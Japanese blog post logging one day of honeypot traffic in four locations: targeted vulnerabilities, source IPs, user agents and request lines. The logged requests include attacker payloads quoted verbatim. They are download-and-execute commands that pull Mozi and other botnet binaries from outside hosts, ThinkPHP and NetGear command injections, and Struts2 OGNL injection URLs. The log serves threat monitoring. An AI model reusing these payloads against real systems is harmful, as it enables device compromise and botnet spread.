コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2021/03/04 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2021/03/04分です。

特徴
共通

Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
zgrabによるスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
WordPress Pluginへのスキャン行為

Location:JP

GPONルータの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Apache Tomcatへのスキャン行為
WordPressへのスキャン行為
5[.]188[.]210[.]227に関する不正通信
UserAgentがDontWorryAboutHowINAMEITLOLIKITSJAWSであるアクセス
UserAgentがHello, Worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm arm arm7;
wget http:/\\/45.14.149.44/arm7;
chmod 777 arm7;
./arm7 netlink;
wget http:/\\/45.14.149.44/arm;
chmod 777 arm;
./arm netlink
Location:US

GPONルータの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
phpMyAdminへのスキャン行為
158[.]51[.]127[.]254に関する不正通信
UserAgentがDontWorryAboutHowINAMEITLOLIKITSJAWSであるアクセス
UserAgentがHello, Worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm arm arm7;
wget http:/\\/45.14.149.44/arm7;
chmod 777 arm7;
./arm7 netlink;
wget http:/\\/45.14.149.44/arm;
chmod 777 arm;
./arm netlink
Location:UK

ThinkPHPの脆弱性を狙うアクセス
Anarchy99によるスキャン行為
IDBTE4M CODE87によるスキャン行為
Apache Tomcatへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 45.15.143.198/beastmode/b3astmode.arm7;
chmod 777 /tmp/b3astmode.arm7;
sh /tmp/b3astmode.arm7 BeastMode.Rep.Jaws
Location:SG

Apache Struts2脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
アクセス数推移

JP:総アクセス数:65 (前日比:+26)
US:総アクセス数:169 (前日比:+116)
UK:総アクセス数:66 (前日比:+17)
SG:総アクセス数:108 (前日比:+68)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
1 2.57.122.97 Romania
1 5.188.210.227 Russia
2 18.224.170.63 United States
1 37.187.139.22 France
1 39.77.141.111 China
1 40.76.48.127 United States
1 40.124.48.39 United States
1 45.58.43.103 United States
22 45.155.205.225 Russia
1 52.156.71.125 United States
1 61.219.11.153 Taiwan
1 70.79.104.209 Canada
1 87.121.52.88 Bulgaria
1 94.232.46.234 Russia
5 100.25.39.90 United States
1 109.23.68.217 France
1 114.43.157.170 Taiwan
1 117.215.251.204 India
1 123.154.237.105 China
1 160.179.228.14 Morocco
1 172.104.242.173 United States
1 172.105.34.166 United States
1 172.105.89.161 United States
1 178.72.68.52 Russia
1 178.175.117.143 Albania
1 192.241.217.29 United States
1 192.241.227.85 United States
1 192.241.227.115 United States
1 193.118.53.210 United States
4 198.20.69.98 United States
2 205.185.122.102 United States
3 207.7.120.154 United States
1 209.141.46.206 United States

UserAgent一覧

件数 UserAgent
18 -
1 DontWorryAboutHowINAMEITLOLIKITSJAWS
1 Go-http-client/1.1
2 Hello, World
2 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
22 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
2 Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
6 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
3 Mozilla/5.0 zgrab/0.x
1 User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705
1 curl/7.55.1

リクエスト内容一覧

件数 Method Request Protocol
2 -
1 SSH-2.0-OpenSSH_8.1
2 \x16\x03\x01
1 GET ../../proc/ HTTP
8 GET /.env HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
1 GET /0bef HTTP/1.0
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1]=curl+--user-agent+curl_tp5+http[:]//31[.]210[.]20[.]120/ldr.sh sh|HTTP/1.1
1 GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0
2 GET /config/getuser?index=0 HTTP/1.1
2 GET /console/ HTTP/1.1
2 GET /favicon.ico HTTP/1.1
1 GET /hudson HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /jenkins/login HTTP/1.0
1 GET /login HTTP/1.0
2 GET /manager/html HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\/45.14.149.44/arm7;chmod+777+arm7;./arm7+netlink;wget+http:/\/45.14.149.44/arm;chmod+777+arm;./arm+netlink HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET /wp-login.php HTTP/1.1
1 GET http[:]//5[.]188[.]210[.]227/echo.php HTTP/1.1
1 HEAD /robots.txt HTTP/1.0
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
2 POST /GponForm/diag_Form?images/ HTTP/1.1
3 POST /HNAP1/ HTTP/1.0
2 POST /api/jsonws/invoke HTTP/1.1
1 POST /images.php HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 2.57.122.97 Romania
1 27.38.248.243 China
1 27.216.139.138 China
1 37.187.139.22 France
1 40.87.65.115 United States
11 45.155.205.225 Russia
10 49.234.145.59 China
1 50.249.137.89 United States
10 60.190.199.170 China
2 91.220.163.60 Ukraine
1 91.239.130.31 United Kingdom
1 103.141.136.70 Vietnam
1 116.73.59.81 India
1 129.146.190.190 United States
3 163.172.159.134 United Kingdom
3 163.172.168.251 United Kingdom
9 165.232.164.138 United States
1 172.105.89.161 United States
101 177.75.202.207 Brazil
2 178.62.52.198 United States
1 192.241.217.16 United States
1 192.241.227.204 United States
1 193.118.53.194 United States
2 205.185.122.102 United States
1 209.141.46.206 United States
1 213.202.233.194 Germany

UserAgent一覧

件数 UserAgent
11 -
1 DontWorryAboutHowINAMEITLOLIKITSJAWS
1 Go-http-client/1.1
1 Hello, World
2 Mozilla 5/0
10 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; KB974488)
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
101 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
8 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2 Mozilla/5.0 (Windows NT 6.1; rv:65.0.1) Gecko/20100101 Firefox/65.0.1
9 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
3 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
2 Mozilla/5.0 zgrab/0.x
1 curl/7.55.1
1 python-requests/2.25.1

リクエスト内容一覧

件数 Method Request Protocol
3 \x03
2 CONNECT www[.]bing[.]com/:443 HTTP/1.1
1 GET ../../proc/ HTTP
5 GET /.env HTTP/1.1
1 GET /0bef HTTP/1.0
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /EIMSII/assets/bundle/commons.js HTTP/1.1
1 GET /TP/html/public/index.php HTTP/1.1
1 GET /TP/index.php HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
1 GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /app/lan/BeforeLoginCn.js HTTP/1.1
1 GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0
1 GET /c/version.js HTTP/1.1
1 GET /chs/js/lang_zh_tw.js HTTP/1.1
1 GET /client_area/ HTTP/1.1
1 GET /cn.gzjs HTTP/1.1
2 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /eims3/assets/bundle/commons.js HTTP/1.1
1 GET /elrekt.php HTTP/1.1
1 GET /erm/help/how_to_getstarted.html HTTP/1.1
1 GET /etms/assets/bundle/commons.js HTTP/1.1
1 GET /goip/cron.htm HTTP/1.1
1 GET /html/public/index.php HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /index.html?findcli=-1 HTTP/1.1
1 GET /index.php HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
101 GET /phpmyadmin/ HTTP/1.1
1 GET /public/index.php HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\/45.14.149.44/arm7;chmod+777+arm7;./arm7+netlink;wget+http:/\/45.14.149.44/arm;chmod+777+arm;./arm+netlink HTTP/1.1
1 GET /smb_scheduler/cdr.htm HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /stalker_portal/c/ HTTP/1.1
1 GET /stalker_portal/c/version.js HTTP/1.1
1 GET /stream/rtmp.php HTTP/1.1
1 GET /streaming/clients_live.php HTTP/1.1
2 GET /system_api.php HTTP/1.1
1 GET /thinkphp/html/public/index.php HTTP/1.1
1 GET /vendor/phpunit/phpunit/phpunit.xml HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET http[:]//158[.]51[.]127[.]254/ok.txt HTTP/1.1
2 GET http[:]//www[.]bing[.]com/ HTTP/1.1
1 HEAD / HTTP/1.0
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /api/jsonws/invoke HTTP/1.1
1 POST /images.php HTTP/1.1
1 POST /index.php?s=captcha HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST http[:]//dearth[.]fun/0ff247f8773a31fbbdca33ded742bdc5cca2d33c9bdc7686ba520b8a8b33d1b2838551f2c18e152a2b59691f9aba6842908cafb6dad2ec02c3d0aa9572609344c3daf736c16501e385223270ff85b6c41af983bfc33df241004fa578beabb7cd HTTP/1.1
1 POST http[:]//kaymcclurg[.]best/9d251f458f56953ba3b584a49dd2cc8d2587a5527e6591ef3d14cd1e564a6084eefdd23a184f1fa63cfbbc85d02bdb1b815c7e911027cb3b25faa2f1bf37080438bd390e1010cfcdf9e9eefa2716ccf514a995211ebb3f9324a882efdcb639e2 HTTP/1.1
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
1 2.57.122.97 Romania
1 23.101.213.72 United States
1 45.133.1.133 Netherlands
22 45.155.205.225 Russia
3 61.160.196.102 China
1 61.219.11.153 Taiwan
3 85.132.3.30 Azerbaijan
1 101.0.34.152 India
10 106.13.19.140 China
3 111.7.96.149 China
1 112.117.201.61 China
1 129.146.190.190 United States
1 172.105.89.161 United States
1 192.53.166.62 United States
1 192.241.226.14 United States
1 192.241.227.191 United States
1 192.241.228.30 United States
1 193.118.53.194 United States
2 205.185.122.102 United States
9 206.81.19.131 United States
1 206.189.222.214 United States

UserAgent一覧

件数 UserAgent
12 -
1 Anarchy99
1 Chrome/54.0 (Windows NT 10.0)
2 Go-http-client/1.1
1 Hello, world
1 IDBTE4M CODE87
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
8 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
22 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
9 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
3 Mozilla/5.0 zgrab/0.x
1 User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705

リクエスト内容一覧

件数 Method Request Protocol
1 -
1 \x16\x03
2 \x16\x03\x01
1 GET ../../proc/ HTTP
2 GET /.env HTTP/1.1
1 GET /0bef HTTP/1.0
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /TP/html/public/index.php HTTP/1.1
1 GET /TP/index.php HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
1 GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /c/version.js HTTP/1.1
1 GET /client_area/ HTTP/1.1
2 GET /config/getuser?index=0 HTTP/1.1
2 GET /console/ HTTP/1.1
1 GET /elrekt.php HTTP/1.1
2 GET /favicon.ico HTTP/1.1
1 GET /html/public/index.php HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /index.php HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /jenkins/login HTTP/1.0
1 GET /login HTTP/1.0
1 GET /manager/html HTTP/1.0
1 GET /manager/html HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /public/index.php HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+45.15.143.198/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /stalker_portal/c/ HTTP/1.1
1 GET /stalker_portal/c/version.js HTTP/1.1
1 GET /stream/rtmp.php HTTP/1.1
1 GET /streaming/clients_live.php HTTP/1.1
2 GET /system_api.php HTTP/1.1
1 GET /thinkphp/html/public/index.php HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 HEAD / HTTP/1.0
1 HEAD / HTTP/1.1
1 HEAD /config.asp HTTP/1.1
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
2 POST /api/jsonws/invoke HTTP/1.1
1 POST /index.php?s=captcha HTTP/1.1
1 POST /op_type=ping&destination=cd /tmp;
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
3 18.184.78.103 United States
1 37.187.139.22 France
1 40.87.65.115 United States
1 40.87.150.70 United States
1 42.239.205.204 China
22 45.155.205.225 Russia
9 46.101.29.82 United States
1 49.143.32.6 South Korea
3 51.158.78.179 France
1 59.96.25.3 India
1 61.219.11.153 Taiwan
2 92.118.12.92 Germany
1 94.232.47.170 Russia
1 117.215.212.209 India
1 118.36.49.27 South Korea
3 145.239.82.0 France
1 172.105.77.209 United States
5 176.170.128.78 France
42 187.45.116.162 Brazil
1 192.53.166.62 United States
1 192.241.220.224 United States
1 192.241.221.178 United States
1 192.241.227.114 United States
1 193.118.53.202 United States
3 205.185.122.102 United States

UserAgent一覧

件数 UserAgent
12 -
1 Hello, world
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Safari/537.36 OPR/53.0.2907.68
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
8 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
22 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0.4) Gecko/20100101 Firefox/57.0.4
6 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
3 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
3 Mozilla/5.0 zgrab/0.x
1 curl/7.55.1
42 python-requests/2.12.4
3 python-requests/2.25.1

リクエスト内容一覧

件数 Method Request Protocol
2 -
3 \x03
2 CONNECT www[.]bing[.]com/:443 HTTP/1.1
9 GET /.env HTTP/1.1
1 GET //%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest HTTP/1.1
1 GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /actuator/health HTTP/1.1
2 GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0
1 GET /c/version.js HTTP/1.1
1 GET /client_area/ HTTP/1.1
3 GET /config/getuser?index=0 HTTP/1.1
2 GET /console/ HTTP/1.1
1 GET /default.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /index.action/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1
1 GET /index.do/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1
1 GET /index.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /indexAction.action/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1
1 GET /login.action/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1
1 GET /login.do/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1
1 GET /login.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1
1 GET /login/indexAction.action/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1
1 GET /login/login.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1
1 GET /main.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /register.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//59[.]96[.]25[.]3:44990/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /stalker_portal/c/ HTTP/1.1
1 GET /stalker_portal/c/version.js HTTP/1.1
1 GET /stream/rtmp.php HTTP/1.1
1 GET /streaming/clients_live.php HTTP/1.1
2 GET /system_api.php HTTP/1.1
3 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
